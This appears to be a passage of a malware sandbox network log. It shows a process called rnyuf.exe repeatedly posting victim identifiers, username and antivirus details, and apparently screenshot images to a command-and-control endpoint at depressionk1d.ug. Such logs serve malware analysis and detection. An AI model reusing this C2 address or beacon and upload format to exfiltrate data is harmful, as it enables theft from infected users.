                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.088759899 CET7253INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          146192.168.2.449931178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:50.237103939 CET7253OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.263988018 CET7254INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          147192.168.2.449932178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:50.421726942 CET7254OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.447038889 CET7255INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:50.461623907 CET7255OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:50.461782932 CET7255OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:50.462085962 CET7265OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:50.462224007 CET7268OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:50.485496044 CET7273OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:50.485570908 CET7294OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:50.508112907 CET7316OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:50.508181095 CET7337OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:23:50.508234024 CET7346OUTData Raw: 4d ef 45 30 1d 9a 5c d3 69 69 a1 0e 14 bd e9 a2 97 34 ee 21 d9 a2 9b 9a 33 4c 56 1d 9a 5c d3 33 4b 4c 56 1e 29 c2 9a 3b 52 8a 68 4c 5a 5a 4a 29 88 5a 29 28 34 08 5a 5a 4a 29 80 b9 a5 a4 a2 80 14 1a 70 a6 52 8a 68 43 fb 52 d3 41 a5 aa 24 78 34 b4
                          Data Ascii: ME0\ii4!3LV\3KLV);RhLZZJ)Z)(4ZZJ)pRhCRA$x4iiE474fNPH(N5Dp4id8U!N$qXp4gLZB+hEQf4s).MOZhjvsUqXwJ\hyM2lIK`4<Pj=n+
                          Nov 12, 2021 22:23:50.530805111 CET7352OUTData Raw: 85 cd 04 d3 73 49 9a 2e 3b 0e a3 34 ca 5a 43 b0 b9 a3 b5 25 14 00 a6 92 92 97 b5 20 0c d2 e6 9b 49 40 0f cd 14 dc d1 40 0b 45 25 14 00 ec d3 68 a2 80 0a 5a 4a 33 45 c0 29 69 39 a2 81 87 7a 5c d2 51 40 8a d4 51 45 62 6c 7a 8f c0 6f f9 1e 6f 7f ec
                          Data Ascii: sI.;4ZC% I@@E%hZJ3E)i9z\Q@QEblzoo2*dUiS#k{`?dUEbs5IwzxO'XJc5|Uea?U5/F|i(E}-%-[Yu[Yb?GgGG
                          Nov 12, 2021 22:23:50.530839920 CET7361OUTData Raw: 14 02 0a e4 11 c8 22 a7 be bc bb d4 ee 9a eb 50 bb b8 bb b8 60 01 96 e2 53 23 90 38 19 24 93 4b d9 c9 3d 3f ae a5 3a 89 b6 df f5 a3 5f a8 db 89 16 5b bb 89 10 e5 5e 56 65 3e a0 9a d6 f0 77 fc 8f 1e 1f ff 00 b0 95 bf fe 8c 5a c5 03 02 82 32 30 6b
                          Data Ascii: "P`S#8$K=?:_[^Ve>wZ20kX.Tc)fs!jOSPoSw'Ho?QZ$vlPsPV4=#@7!0bQi5mv/eQ;ao$MomYH'-sZm|'6kjzZHbx8i
                          Nov 12, 2021 22:23:50.556360006 CET7362INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:50.564843893 CET7362OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.591695070 CET7362INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          148192.168.2.449933178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:50.733889103 CET7363OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.762523890 CET7363INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          149192.168.2.449934178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:50.901207924 CET7364OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:50.927054882 CET7364INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:50 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          15192.168.2.449796178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:17.775341988 CET2194OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:17.775444031 CET2194OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:17.775630951 CET2204OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:17.775707006 CET2207OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:17.798115015 CET2210OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:17.798182011 CET2213OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:17.798201084 CET2215OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:17.798214912 CET2218OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:17.798229933 CET2221OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:17.798244953 CET2223OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:17.798383951 CET2226OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:17.870863914 CET2304INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:17 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          150192.168.2.449935178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.045892954 CET7365OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:51.046029091 CET7365OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:51.046344995 CET7375OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:51.046519041 CET7378OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:51.068872929 CET7384OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:51.068916082 CET7392OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:51.068933010 CET7395OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:51.068945885 CET7399OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:51.068974972 CET7404OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:51.091346025 CET7408OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:51.091375113 CET7413OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
